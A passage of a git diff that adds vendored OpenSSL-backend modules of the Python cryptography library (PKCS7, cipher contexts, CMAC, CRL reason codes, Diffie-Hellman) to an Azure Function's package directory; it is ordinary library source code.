self._lib.Cryptography_HAS_POLY1305 == 1 + + def create_poly1305_ctx(self, key: bytes) -> _Poly1305Context: + utils._check_byteslike("key", key) + if len(key) != _POLY1305_KEY_SIZE: + raise ValueError("A poly1305 key is 32 bytes long") + + return _Poly1305Context(self, key) + + def pkcs7_supported(self) -> bool: + return not self._lib.CRYPTOGRAPHY_IS_BORINGSSL + + def load_pem_pkcs7_certificates( + self, data: bytes + ) -> typing.List[x509.Certificate]: + utils._check_bytes("data", data) + bio = self._bytes_to_bio(data) + p7 = self._lib.PEM_read_bio_PKCS7( + bio.bio, self._ffi.NULL, self._ffi.NULL, self._ffi.NULL + ) + if p7 == self._ffi.NULL: + self._consume_errors() + raise ValueError("Unable to parse PKCS7 data") + + p7 = self._ffi.gc(p7, self._lib.PKCS7_free) + return self._load_pkcs7_certificates(p7) + + def load_der_pkcs7_certificates( + self, data: bytes + ) -> typing.List[x509.Certificate]: + utils._check_bytes("data", data) + bio = self._bytes_to_bio(data) + p7 = self._lib.d2i_PKCS7_bio(bio.bio, self._ffi.NULL) + if p7 == self._ffi.NULL: + self._consume_errors() + raise ValueError("Unable to parse PKCS7 data") + + p7 = self._ffi.gc(p7, self._lib.PKCS7_free) + return self._load_pkcs7_certificates(p7) + + def _load_pkcs7_certificates(self, p7): + nid = self._lib.OBJ_obj2nid(p7.type) + self.openssl_assert(nid != self._lib.NID_undef) + if nid != self._lib.NID_pkcs7_signed: + raise UnsupportedAlgorithm( + "Only basic signed structures are currently supported. NID" + " for this data was {}".format(nid), + _Reasons.UNSUPPORTED_SERIALIZATION, + ) + + sk_x509 = p7.d.sign.cert + num = self._lib.sk_X509_num(sk_x509) + certs = [] + for i in range(num): + x509 = self._lib.sk_X509_value(sk_x509, i) + self.openssl_assert(x509 != self._ffi.NULL) + res = self._lib.X509_up_ref(x509) + # When OpenSSL is less than 1.1.0 up_ref returns the current + # refcount. On 1.1.0+ it returns 1 for success. 
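+            # Editor's note (illustrative only): this loop backs the public
+            # PKCS7 loaders, e.g.
+            #
+            #     from cryptography.hazmat.primitives.serialization.pkcs7 import (
+            #         load_pem_pkcs7_certificates,
+            #     )
+            #     certs = load_pem_pkcs7_certificates(pem_bytes)
+            #     # -> list of x509.Certificate objects
+            #
+            # `pem_bytes` is an assumed PEM-encoded signed PKCS7 blob.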
+            self.openssl_assert(res >= 1)
+            x509 = self._ffi.gc(x509, self._lib.X509_free)
+            cert = self._ossl2cert(x509)
+            certs.append(cert)
+
+        return certs
+
+    def pkcs7_serialize_certificates(
+        self,
+        certs: typing.List[x509.Certificate],
+        encoding: serialization.Encoding,
+    ):
+        certs = list(certs)
+        if not certs or not all(
+            isinstance(cert, x509.Certificate) for cert in certs
+        ):
+            raise TypeError("certs must be a list of certs with length >= 1")
+
+        if encoding not in (
+            serialization.Encoding.PEM,
+            serialization.Encoding.DER,
+        ):
+            raise TypeError("encoding must be DER or PEM from the Encoding enum")
+
+        certs_sk = self._lib.sk_X509_new_null()
+        certs_sk = self._ffi.gc(certs_sk, self._lib.sk_X509_free)
+        # This list is to keep the x509 values alive until end of function
+        ossl_certs = []
+        for cert in certs:
+            ossl_cert = self._cert2ossl(cert)
+            ossl_certs.append(ossl_cert)
+            res = self._lib.sk_X509_push(certs_sk, ossl_cert)
+            self.openssl_assert(res >= 1)
+        # We use PKCS7_sign here because it creates the PKCS7 and PKCS7_SIGNED
+        # structures for us rather than requiring manual assignment.
+        p7 = self._lib.PKCS7_sign(
+            self._ffi.NULL,
+            self._ffi.NULL,
+            certs_sk,
+            self._ffi.NULL,
+            self._lib.PKCS7_PARTIAL,
+        )
+        bio_out = self._create_mem_bio_gc()
+        if encoding is serialization.Encoding.PEM:
+            res = self._lib.PEM_write_bio_PKCS7_stream(
+                bio_out, p7, self._ffi.NULL, 0
+            )
+        else:
+            assert encoding is serialization.Encoding.DER
+            res = self._lib.i2d_PKCS7_bio(bio_out, p7)
+
+        self.openssl_assert(res == 1)
+        return self._read_mem_bio(bio_out)
+
+    def pkcs7_sign(
+        self,
+        builder: pkcs7.PKCS7SignatureBuilder,
+        encoding: serialization.Encoding,
+        options: typing.List[pkcs7.PKCS7Options],
+    ) -> bytes:
+        assert builder._data is not None
+        bio = self._bytes_to_bio(builder._data)
+        init_flags = self._lib.PKCS7_PARTIAL
+        final_flags = 0
+
+        if len(builder._additional_certs) == 0:
+            certs = self._ffi.NULL
+        else:
+            certs = self._lib.sk_X509_new_null()
+            certs = self._ffi.gc(certs, self._lib.sk_X509_free)
+            # This list is to keep the x509 values alive until end of function
+            ossl_certs = []
+            for cert in builder._additional_certs:
+                ossl_cert = self._cert2ossl(cert)
+                ossl_certs.append(ossl_cert)
+                res = self._lib.sk_X509_push(certs, ossl_cert)
+                self.openssl_assert(res >= 1)
+
+        if pkcs7.PKCS7Options.DetachedSignature in options:
+            # Don't embed the data in the PKCS7 structure
+            init_flags |= self._lib.PKCS7_DETACHED
+            final_flags |= self._lib.PKCS7_DETACHED
+
+        # This just inits a structure for us. However, there
+        # are flags we need to set, joy.
+        p7 = self._lib.PKCS7_sign(
+            self._ffi.NULL,
+            self._ffi.NULL,
+            certs,
+            self._ffi.NULL,
+            init_flags,
+        )
+        self.openssl_assert(p7 != self._ffi.NULL)
+        p7 = self._ffi.gc(p7, self._lib.PKCS7_free)
+        signer_flags = 0
+        # These flags are configurable on a per-signature basis
+        # but we've deliberately chosen to make the API only allow
+        # setting it across all signatures for now.
+        if pkcs7.PKCS7Options.NoCapabilities in options:
+            signer_flags |= self._lib.PKCS7_NOSMIMECAP
+        elif pkcs7.PKCS7Options.NoAttributes in options:
+            signer_flags |= self._lib.PKCS7_NOATTR
+
+        if pkcs7.PKCS7Options.NoCerts in options:
+            signer_flags |= self._lib.PKCS7_NOCERTS
+
+        for certificate, private_key, hash_algorithm in builder._signers:
+            ossl_cert = self._cert2ossl(certificate)
+            md = self._evp_md_non_null_from_algorithm(hash_algorithm)
+            p7signerinfo = self._lib.PKCS7_sign_add_signer(
+                p7,
+                ossl_cert,
+                private_key._evp_pkey,  # type: ignore[union-attr]
+                md,
+                signer_flags,
+            )
+            self.openssl_assert(p7signerinfo != self._ffi.NULL)
+
+        for option in options:
+            # DetachedSignature, NoCapabilities, and NoAttributes are already
+            # handled so we just need to check these last two options.
+            if option is pkcs7.PKCS7Options.Text:
+                final_flags |= self._lib.PKCS7_TEXT
+            elif option is pkcs7.PKCS7Options.Binary:
+                final_flags |= self._lib.PKCS7_BINARY
+
+        bio_out = self._create_mem_bio_gc()
+        if encoding is serialization.Encoding.SMIME:
+            # This finalizes the structure
+            res = self._lib.SMIME_write_PKCS7(
+                bio_out, p7, bio.bio, final_flags
+            )
+        elif encoding is serialization.Encoding.PEM:
+            res = self._lib.PKCS7_final(p7, bio.bio, final_flags)
+            self.openssl_assert(res == 1)
+            res = self._lib.PEM_write_bio_PKCS7_stream(
+                bio_out, p7, bio.bio, final_flags
+            )
+        else:
+            assert encoding is serialization.Encoding.DER
+            # We need to call finalize here because i2d_PKCS7_bio does not
+            # finalize.
+            res = self._lib.PKCS7_final(p7, bio.bio, final_flags)
+            self.openssl_assert(res == 1)
+            # OpenSSL 3.0 leaves a random bio error on the stack:
+            # https://github.com/openssl/openssl/issues/16681
+            if self._lib.CRYPTOGRAPHY_OPENSSL_300_OR_GREATER:
+                self._consume_errors()
+            res = self._lib.i2d_PKCS7_bio(bio_out, p7)
+        self.openssl_assert(res == 1)
+        return self._read_mem_bio(bio_out)
+
+
+class GetCipherByName:
+    def __init__(self, fmt: str):
+        self._fmt = fmt
+
+    def __call__(self, backend: Backend, cipher: CipherAlgorithm, mode: Mode):
+        cipher_name = self._fmt.format(cipher=cipher, mode=mode).lower()
+        return backend._lib.EVP_get_cipherbyname(cipher_name.encode("ascii"))
+
+
+def _get_xts_cipher(backend: Backend, cipher: AES, mode):
+    cipher_name = "aes-{}-xts".format(cipher.key_size // 2)
+    return backend._lib.EVP_get_cipherbyname(cipher_name.encode("ascii"))
+
+
+backend = Backend()
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/ciphers.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/ciphers.py
new file mode 100644
index 0000000..9cfecc2
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/ciphers.py
@@ -0,0 +1,282 @@
+# This file is dual licensed under the terms of the Apache License, Version
+# 2.0, and the BSD License. See the LICENSE file in the root of this repository
+# for complete details.
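The pkcs7_sign method above is normally reached through the public pkcs7.PKCS7SignatureBuilder API rather than invoked directly. A minimal sketch of driving it, assuming cert and key are an already-loaded x509.Certificate and its matching private key (those names are illustrative, not part of the library):

    from cryptography.hazmat.primitives import hashes, serialization
    from cryptography.hazmat.primitives.serialization import pkcs7

    # cert and key are assumed to have been loaded elsewhere, e.g. via
    # x509.load_pem_x509_certificate and serialization.load_pem_private_key.
    signed = (
        pkcs7.PKCS7SignatureBuilder()
        .set_data(b"payload to sign")
        .add_signer(cert, key, hashes.SHA256())
        # DetachedSignature maps onto the PKCS7_DETACHED flags set above.
        .sign(serialization.Encoding.SMIME, [pkcs7.PKCS7Options.DetachedSignature])
    )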
+ +import typing + +from cryptography.exceptions import InvalidTag, UnsupportedAlgorithm, _Reasons +from cryptography.hazmat.primitives import ciphers +from cryptography.hazmat.primitives.ciphers import algorithms, modes + + +if typing.TYPE_CHECKING: + from cryptography.hazmat.backends.openssl.backend import Backend + + +class _CipherContext: + _ENCRYPT = 1 + _DECRYPT = 0 + _MAX_CHUNK_SIZE = 2**30 - 1 + + def __init__( + self, backend: "Backend", cipher, mode, operation: int + ) -> None: + self._backend = backend + self._cipher = cipher + self._mode = mode + self._operation = operation + self._tag: typing.Optional[bytes] = None + + if isinstance(self._cipher, ciphers.BlockCipherAlgorithm): + self._block_size_bytes = self._cipher.block_size // 8 + else: + self._block_size_bytes = 1 + + ctx = self._backend._lib.EVP_CIPHER_CTX_new() + ctx = self._backend._ffi.gc( + ctx, self._backend._lib.EVP_CIPHER_CTX_free + ) + + registry = self._backend._cipher_registry + try: + adapter = registry[type(cipher), type(mode)] + except KeyError: + raise UnsupportedAlgorithm( + "cipher {} in {} mode is not supported " + "by this backend.".format( + cipher.name, mode.name if mode else mode + ), + _Reasons.UNSUPPORTED_CIPHER, + ) + + evp_cipher = adapter(self._backend, cipher, mode) + if evp_cipher == self._backend._ffi.NULL: + msg = "cipher {0.name} ".format(cipher) + if mode is not None: + msg += "in {0.name} mode ".format(mode) + msg += ( + "is not supported by this backend (Your version of OpenSSL " + "may be too old. Current version: {}.)" + ).format(self._backend.openssl_version_text()) + raise UnsupportedAlgorithm(msg, _Reasons.UNSUPPORTED_CIPHER) + + if isinstance(mode, modes.ModeWithInitializationVector): + iv_nonce = self._backend._ffi.from_buffer( + mode.initialization_vector + ) + elif isinstance(mode, modes.ModeWithTweak): + iv_nonce = self._backend._ffi.from_buffer(mode.tweak) + elif isinstance(mode, modes.ModeWithNonce): + iv_nonce = self._backend._ffi.from_buffer(mode.nonce) + elif isinstance(cipher, algorithms.ChaCha20): + iv_nonce = self._backend._ffi.from_buffer(cipher.nonce) + else: + iv_nonce = self._backend._ffi.NULL + # begin init with cipher and operation type + res = self._backend._lib.EVP_CipherInit_ex( + ctx, + evp_cipher, + self._backend._ffi.NULL, + self._backend._ffi.NULL, + self._backend._ffi.NULL, + operation, + ) + self._backend.openssl_assert(res != 0) + # set the key length to handle variable key ciphers + res = self._backend._lib.EVP_CIPHER_CTX_set_key_length( + ctx, len(cipher.key) + ) + self._backend.openssl_assert(res != 0) + if isinstance(mode, modes.GCM): + res = self._backend._lib.EVP_CIPHER_CTX_ctrl( + ctx, + self._backend._lib.EVP_CTRL_AEAD_SET_IVLEN, + len(iv_nonce), + self._backend._ffi.NULL, + ) + self._backend.openssl_assert(res != 0) + if mode.tag is not None: + res = self._backend._lib.EVP_CIPHER_CTX_ctrl( + ctx, + self._backend._lib.EVP_CTRL_AEAD_SET_TAG, + len(mode.tag), + mode.tag, + ) + self._backend.openssl_assert(res != 0) + self._tag = mode.tag + + # pass key/iv + res = self._backend._lib.EVP_CipherInit_ex( + ctx, + self._backend._ffi.NULL, + self._backend._ffi.NULL, + self._backend._ffi.from_buffer(cipher.key), + iv_nonce, + operation, + ) + + # Check for XTS mode duplicate keys error + errors = self._backend._consume_errors() + lib = self._backend._lib + if res == 0 and ( + ( + lib.CRYPTOGRAPHY_OPENSSL_111D_OR_GREATER + and errors[0]._lib_reason_match( + lib.ERR_LIB_EVP, lib.EVP_R_XTS_DUPLICATED_KEYS + ) + ) + or ( + lib.Cryptography_HAS_PROVIDERS + and 
errors[0]._lib_reason_match( + lib.ERR_LIB_PROV, lib.PROV_R_XTS_DUPLICATED_KEYS + ) + ) + ): + raise ValueError("In XTS mode duplicated keys are not allowed") + + self._backend.openssl_assert(res != 0, errors=errors) + + # We purposely disable padding here as it's handled higher up in the + # API. + self._backend._lib.EVP_CIPHER_CTX_set_padding(ctx, 0) + self._ctx = ctx + + def update(self, data: bytes) -> bytes: + buf = bytearray(len(data) + self._block_size_bytes - 1) + n = self.update_into(data, buf) + return bytes(buf[:n]) + + def update_into(self, data: bytes, buf: bytes) -> int: + total_data_len = len(data) + if len(buf) < (total_data_len + self._block_size_bytes - 1): + raise ValueError( + "buffer must be at least {} bytes for this " + "payload".format(len(data) + self._block_size_bytes - 1) + ) + + data_processed = 0 + total_out = 0 + outlen = self._backend._ffi.new("int *") + baseoutbuf = self._backend._ffi.from_buffer(buf) + baseinbuf = self._backend._ffi.from_buffer(data) + + while data_processed != total_data_len: + outbuf = baseoutbuf + total_out + inbuf = baseinbuf + data_processed + inlen = min(self._MAX_CHUNK_SIZE, total_data_len - data_processed) + + res = self._backend._lib.EVP_CipherUpdate( + self._ctx, outbuf, outlen, inbuf, inlen + ) + if res == 0 and isinstance(self._mode, modes.XTS): + self._backend._consume_errors() + raise ValueError( + "In XTS mode you must supply at least a full block in the " + "first update call. For AES this is 16 bytes." + ) + else: + self._backend.openssl_assert(res != 0) + data_processed += inlen + total_out += outlen[0] + + return total_out + + def finalize(self) -> bytes: + if ( + self._operation == self._DECRYPT + and isinstance(self._mode, modes.ModeWithAuthenticationTag) + and self.tag is None + ): + raise ValueError( + "Authentication tag must be provided when decrypting." + ) + + buf = self._backend._ffi.new("unsigned char[]", self._block_size_bytes) + outlen = self._backend._ffi.new("int *") + res = self._backend._lib.EVP_CipherFinal_ex(self._ctx, buf, outlen) + if res == 0: + errors = self._backend._consume_errors() + + if not errors and isinstance(self._mode, modes.GCM): + raise InvalidTag + + lib = self._backend._lib + self._backend.openssl_assert( + errors[0]._lib_reason_match( + lib.ERR_LIB_EVP, + lib.EVP_R_DATA_NOT_MULTIPLE_OF_BLOCK_LENGTH, + ) + or ( + lib.Cryptography_HAS_PROVIDERS + and errors[0]._lib_reason_match( + lib.ERR_LIB_PROV, + lib.PROV_R_WRONG_FINAL_BLOCK_LENGTH, + ) + ) + or ( + lib.CRYPTOGRAPHY_IS_BORINGSSL + and errors[0].reason + == lib.CIPHER_R_DATA_NOT_MULTIPLE_OF_BLOCK_LENGTH + ), + errors=errors, + ) + raise ValueError( + "The length of the provided data is not a multiple of " + "the block length." 
+ ) + + if ( + isinstance(self._mode, modes.GCM) + and self._operation == self._ENCRYPT + ): + tag_buf = self._backend._ffi.new( + "unsigned char[]", self._block_size_bytes + ) + res = self._backend._lib.EVP_CIPHER_CTX_ctrl( + self._ctx, + self._backend._lib.EVP_CTRL_AEAD_GET_TAG, + self._block_size_bytes, + tag_buf, + ) + self._backend.openssl_assert(res != 0) + self._tag = self._backend._ffi.buffer(tag_buf)[:] + + res = self._backend._lib.EVP_CIPHER_CTX_reset(self._ctx) + self._backend.openssl_assert(res == 1) + return self._backend._ffi.buffer(buf)[: outlen[0]] + + def finalize_with_tag(self, tag: bytes) -> bytes: + tag_len = len(tag) + if tag_len < self._mode._min_tag_length: + raise ValueError( + "Authentication tag must be {} bytes or longer.".format( + self._mode._min_tag_length + ) + ) + elif tag_len > self._block_size_bytes: + raise ValueError( + "Authentication tag cannot be more than {} bytes.".format( + self._block_size_bytes + ) + ) + res = self._backend._lib.EVP_CIPHER_CTX_ctrl( + self._ctx, self._backend._lib.EVP_CTRL_AEAD_SET_TAG, len(tag), tag + ) + self._backend.openssl_assert(res != 0) + self._tag = tag + return self.finalize() + + def authenticate_additional_data(self, data: bytes) -> None: + outlen = self._backend._ffi.new("int *") + res = self._backend._lib.EVP_CipherUpdate( + self._ctx, + self._backend._ffi.NULL, + outlen, + self._backend._ffi.from_buffer(data), + len(data), + ) + self._backend.openssl_assert(res != 0) + + @property + def tag(self) -> typing.Optional[bytes]: + return self._tag diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/cmac.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/cmac.py new file mode 100644 index 0000000..5b8699a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/cmac.py @@ -0,0 +1,87 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. 
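The _CipherContext above backs the encryptor()/decryptor() objects returned by the public Cipher API; its GCM branches correspond to the tag handling in finalize and finalize_with_tag. A minimal AES-GCM round-trip sketch (key, iv, and the messages are illustrative values):

    import os
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    key, iv = os.urandom(32), os.urandom(12)

    enc = Cipher(algorithms.AES(key), modes.GCM(iv)).encryptor()
    enc.authenticate_additional_data(b"header")  # EVP_CipherUpdate with a NULL out buffer
    ct = enc.update(b"secret message") + enc.finalize()
    tag = enc.tag  # fetched via EVP_CTRL_AEAD_GET_TAG at encrypt-time finalize

    dec = Cipher(algorithms.AES(key), modes.GCM(iv, tag)).decryptor()
    dec.authenticate_additional_data(b"header")
    assert dec.update(ct) + dec.finalize() == b"secret message"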
+ +import typing + +from cryptography.exceptions import ( + InvalidSignature, + UnsupportedAlgorithm, + _Reasons, +) +from cryptography.hazmat.primitives import constant_time +from cryptography.hazmat.primitives.ciphers.modes import CBC + +if typing.TYPE_CHECKING: + from cryptography.hazmat.primitives import ciphers + from cryptography.hazmat.backends.openssl.backend import Backend + + +class _CMACContext: + def __init__( + self, + backend: "Backend", + algorithm: "ciphers.BlockCipherAlgorithm", + ctx=None, + ) -> None: + if not backend.cmac_algorithm_supported(algorithm): + raise UnsupportedAlgorithm( + "This backend does not support CMAC.", + _Reasons.UNSUPPORTED_CIPHER, + ) + + self._backend = backend + self._key = algorithm.key + self._algorithm = algorithm + self._output_length = algorithm.block_size // 8 + + if ctx is None: + registry = self._backend._cipher_registry + adapter = registry[type(algorithm), CBC] + + evp_cipher = adapter(self._backend, algorithm, CBC) + + ctx = self._backend._lib.CMAC_CTX_new() + + self._backend.openssl_assert(ctx != self._backend._ffi.NULL) + ctx = self._backend._ffi.gc(ctx, self._backend._lib.CMAC_CTX_free) + + key_ptr = self._backend._ffi.from_buffer(self._key) + res = self._backend._lib.CMAC_Init( + ctx, + key_ptr, + len(self._key), + evp_cipher, + self._backend._ffi.NULL, + ) + self._backend.openssl_assert(res == 1) + + self._ctx = ctx + + def update(self, data: bytes) -> None: + res = self._backend._lib.CMAC_Update(self._ctx, data, len(data)) + self._backend.openssl_assert(res == 1) + + def finalize(self) -> bytes: + buf = self._backend._ffi.new("unsigned char[]", self._output_length) + length = self._backend._ffi.new("size_t *", self._output_length) + res = self._backend._lib.CMAC_Final(self._ctx, buf, length) + self._backend.openssl_assert(res == 1) + + self._ctx = None + + return self._backend._ffi.buffer(buf)[:] + + def copy(self) -> "_CMACContext": + copied_ctx = self._backend._lib.CMAC_CTX_new() + copied_ctx = self._backend._ffi.gc( + copied_ctx, self._backend._lib.CMAC_CTX_free + ) + res = self._backend._lib.CMAC_CTX_copy(copied_ctx, self._ctx) + self._backend.openssl_assert(res == 1) + return _CMACContext(self._backend, self._algorithm, ctx=copied_ctx) + + def verify(self, signature: bytes) -> None: + digest = self.finalize() + if not constant_time.bytes_eq(digest, signature): + raise InvalidSignature("Signature did not match digest.") diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/decode_asn1.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/decode_asn1.py new file mode 100644 index 0000000..9c6ad89 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/decode_asn1.py @@ -0,0 +1,31 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. 
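The _CMACContext above is exercised through the public CMAC primitive; note that finalize releases the underlying CMAC_CTX, so a fresh object is needed per computation. A minimal sketch with an illustrative random key:

    import os
    from cryptography.hazmat.primitives.ciphers import algorithms
    from cryptography.hazmat.primitives.cmac import CMAC

    key = os.urandom(16)
    c = CMAC(algorithms.AES(key))
    c.update(b"message to authenticate")
    tag = c.finalize()  # CMAC_Final; one block (16 bytes) for AES

    v = CMAC(algorithms.AES(key))
    v.update(b"message to authenticate")
    v.verify(tag)  # constant-time comparison; raises InvalidSignature on mismatch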
+ + +from cryptography import x509 + +# CRLReason ::= ENUMERATED { +# unspecified (0), +# keyCompromise (1), +# cACompromise (2), +# affiliationChanged (3), +# superseded (4), +# cessationOfOperation (5), +# certificateHold (6), +# -- value 7 is not used +# removeFromCRL (8), +# privilegeWithdrawn (9), +# aACompromise (10) } +_CRL_ENTRY_REASON_ENUM_TO_CODE = { + x509.ReasonFlags.unspecified: 0, + x509.ReasonFlags.key_compromise: 1, + x509.ReasonFlags.ca_compromise: 2, + x509.ReasonFlags.affiliation_changed: 3, + x509.ReasonFlags.superseded: 4, + x509.ReasonFlags.cessation_of_operation: 5, + x509.ReasonFlags.certificate_hold: 6, + x509.ReasonFlags.remove_from_crl: 8, + x509.ReasonFlags.privilege_withdrawn: 9, + x509.ReasonFlags.aa_compromise: 10, +} diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/dh.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/dh.py new file mode 100644 index 0000000..79e3eaf --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/dh.py @@ -0,0 +1,318 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + +import typing + +from cryptography.exceptions import UnsupportedAlgorithm, _Reasons +from cryptography.hazmat.primitives import serialization +from cryptography.hazmat.primitives.asymmetric import dh + + +if typing.TYPE_CHECKING: + from cryptography.hazmat.backends.openssl.backend import Backend + + +def _dh_params_dup(dh_cdata, backend: "Backend"): + lib = backend._lib + ffi = backend._ffi + + param_cdata = lib.DHparams_dup(dh_cdata) + backend.openssl_assert(param_cdata != ffi.NULL) + param_cdata = ffi.gc(param_cdata, lib.DH_free) + if lib.CRYPTOGRAPHY_IS_LIBRESSL: + # In libressl DHparams_dup don't copy q + q = ffi.new("BIGNUM **") + lib.DH_get0_pqg(dh_cdata, ffi.NULL, q, ffi.NULL) + q_dup = lib.BN_dup(q[0]) + res = lib.DH_set0_pqg(param_cdata, ffi.NULL, q_dup, ffi.NULL) + backend.openssl_assert(res == 1) + + return param_cdata + + +def _dh_cdata_to_parameters(dh_cdata, backend: "Backend") -> "_DHParameters": + param_cdata = _dh_params_dup(dh_cdata, backend) + return _DHParameters(backend, param_cdata) + + +class _DHParameters(dh.DHParameters): + def __init__(self, backend: "Backend", dh_cdata): + self._backend = backend + self._dh_cdata = dh_cdata + + def parameter_numbers(self) -> dh.DHParameterNumbers: + p = self._backend._ffi.new("BIGNUM **") + g = self._backend._ffi.new("BIGNUM **") + q = self._backend._ffi.new("BIGNUM **") + self._backend._lib.DH_get0_pqg(self._dh_cdata, p, q, g) + self._backend.openssl_assert(p[0] != self._backend._ffi.NULL) + self._backend.openssl_assert(g[0] != self._backend._ffi.NULL) + q_val: typing.Optional[int] + if q[0] == self._backend._ffi.NULL: + q_val = None + else: + q_val = self._backend._bn_to_int(q[0]) + return dh.DHParameterNumbers( + p=self._backend._bn_to_int(p[0]), + g=self._backend._bn_to_int(g[0]), + q=q_val, + ) + + def generate_private_key(self) -> dh.DHPrivateKey: + return self._backend.generate_dh_private_key(self) + + def parameter_bytes( + self, + encoding: serialization.Encoding, + format: serialization.ParameterFormat, + ) -> bytes: + if encoding is serialization.Encoding.OpenSSH: + raise TypeError("OpenSSH encoding is not supported") + + if 
format is not serialization.ParameterFormat.PKCS3: + raise ValueError("Only PKCS3 serialization is supported") + + q = self._backend._ffi.new("BIGNUM **") + self._backend._lib.DH_get0_pqg( + self._dh_cdata, self._backend._ffi.NULL, q, self._backend._ffi.NULL + ) + if ( + q[0] != self._backend._ffi.NULL + and not self._backend._lib.Cryptography_HAS_EVP_PKEY_DHX + ): + raise UnsupportedAlgorithm( + "DH X9.42 serialization is not supported", + _Reasons.UNSUPPORTED_SERIALIZATION, + ) + + if encoding is serialization.Encoding.PEM: + if q[0] != self._backend._ffi.NULL: + write_bio = self._backend._lib.PEM_write_bio_DHxparams + else: + write_bio = self._backend._lib.PEM_write_bio_DHparams + elif encoding is serialization.Encoding.DER: + if q[0] != self._backend._ffi.NULL: + write_bio = self._backend._lib.Cryptography_i2d_DHxparams_bio + else: + write_bio = self._backend._lib.i2d_DHparams_bio + else: + raise TypeError("encoding must be an item from the Encoding enum") + + bio = self._backend._create_mem_bio_gc() + res = write_bio(bio, self._dh_cdata) + self._backend.openssl_assert(res == 1) + return self._backend._read_mem_bio(bio) + + +def _get_dh_num_bits(backend, dh_cdata) -> int: + p = backend._ffi.new("BIGNUM **") + backend._lib.DH_get0_pqg(dh_cdata, p, backend._ffi.NULL, backend._ffi.NULL) + backend.openssl_assert(p[0] != backend._ffi.NULL) + return backend._lib.BN_num_bits(p[0]) + + +class _DHPrivateKey(dh.DHPrivateKey): + def __init__(self, backend: "Backend", dh_cdata, evp_pkey): + self._backend = backend + self._dh_cdata = dh_cdata + self._evp_pkey = evp_pkey + self._key_size_bytes = self._backend._lib.DH_size(dh_cdata) + + @property + def key_size(self) -> int: + return _get_dh_num_bits(self._backend, self._dh_cdata) + + def private_numbers(self) -> dh.DHPrivateNumbers: + p = self._backend._ffi.new("BIGNUM **") + g = self._backend._ffi.new("BIGNUM **") + q = self._backend._ffi.new("BIGNUM **") + self._backend._lib.DH_get0_pqg(self._dh_cdata, p, q, g) + self._backend.openssl_assert(p[0] != self._backend._ffi.NULL) + self._backend.openssl_assert(g[0] != self._backend._ffi.NULL) + if q[0] == self._backend._ffi.NULL: + q_val = None + else: + q_val = self._backend._bn_to_int(q[0]) + pub_key = self._backend._ffi.new("BIGNUM **") + priv_key = self._backend._ffi.new("BIGNUM **") + self._backend._lib.DH_get0_key(self._dh_cdata, pub_key, priv_key) + self._backend.openssl_assert(pub_key[0] != self._backend._ffi.NULL) + self._backend.openssl_assert(priv_key[0] != self._backend._ffi.NULL) + return dh.DHPrivateNumbers( + public_numbers=dh.DHPublicNumbers( + parameter_numbers=dh.DHParameterNumbers( + p=self._backend._bn_to_int(p[0]), + g=self._backend._bn_to_int(g[0]), + q=q_val, + ), + y=self._backend._bn_to_int(pub_key[0]), + ), + x=self._backend._bn_to_int(priv_key[0]), + ) + + def exchange(self, peer_public_key: dh.DHPublicKey) -> bytes: + if not isinstance(peer_public_key, _DHPublicKey): + raise TypeError("peer_public_key must be a DHPublicKey") + + ctx = self._backend._lib.EVP_PKEY_CTX_new( + self._evp_pkey, self._backend._ffi.NULL + ) + self._backend.openssl_assert(ctx != self._backend._ffi.NULL) + ctx = self._backend._ffi.gc(ctx, self._backend._lib.EVP_PKEY_CTX_free) + res = self._backend._lib.EVP_PKEY_derive_init(ctx) + self._backend.openssl_assert(res == 1) + res = self._backend._lib.EVP_PKEY_derive_set_peer( + ctx, peer_public_key._evp_pkey + ) + # Invalid kex errors here in OpenSSL 3.0 because checks were moved + # to EVP_PKEY_derive_set_peer + self._exchange_assert(res == 1) + keylen = 
self._backend._ffi.new("size_t *") + res = self._backend._lib.EVP_PKEY_derive( + ctx, self._backend._ffi.NULL, keylen + ) + # Invalid kex errors here in OpenSSL < 3 + self._exchange_assert(res == 1) + self._backend.openssl_assert(keylen[0] > 0) + buf = self._backend._ffi.new("unsigned char[]", keylen[0]) + res = self._backend._lib.EVP_PKEY_derive(ctx, buf, keylen) + self._backend.openssl_assert(res == 1) + + key = self._backend._ffi.buffer(buf, keylen[0])[:] + pad = self._key_size_bytes - len(key) + + if pad > 0: + key = (b"\x00" * pad) + key + + return key + + def _exchange_assert(self, ok: bool) -> None: + if not ok: + errors_with_text = self._backend._consume_errors_with_text() + raise ValueError( + "Error computing shared key.", + errors_with_text, + ) + + def public_key(self) -> dh.DHPublicKey: + dh_cdata = _dh_params_dup(self._dh_cdata, self._backend) + pub_key = self._backend._ffi.new("BIGNUM **") + self._backend._lib.DH_get0_key( + self._dh_cdata, pub_key, self._backend._ffi.NULL + ) + self._backend.openssl_assert(pub_key[0] != self._backend._ffi.NULL) + pub_key_dup = self._backend._lib.BN_dup(pub_key[0]) + self._backend.openssl_assert(pub_key_dup != self._backend._ffi.NULL) + + res = self._backend._lib.DH_set0_key( + dh_cdata, pub_key_dup, self._backend._ffi.NULL + ) + 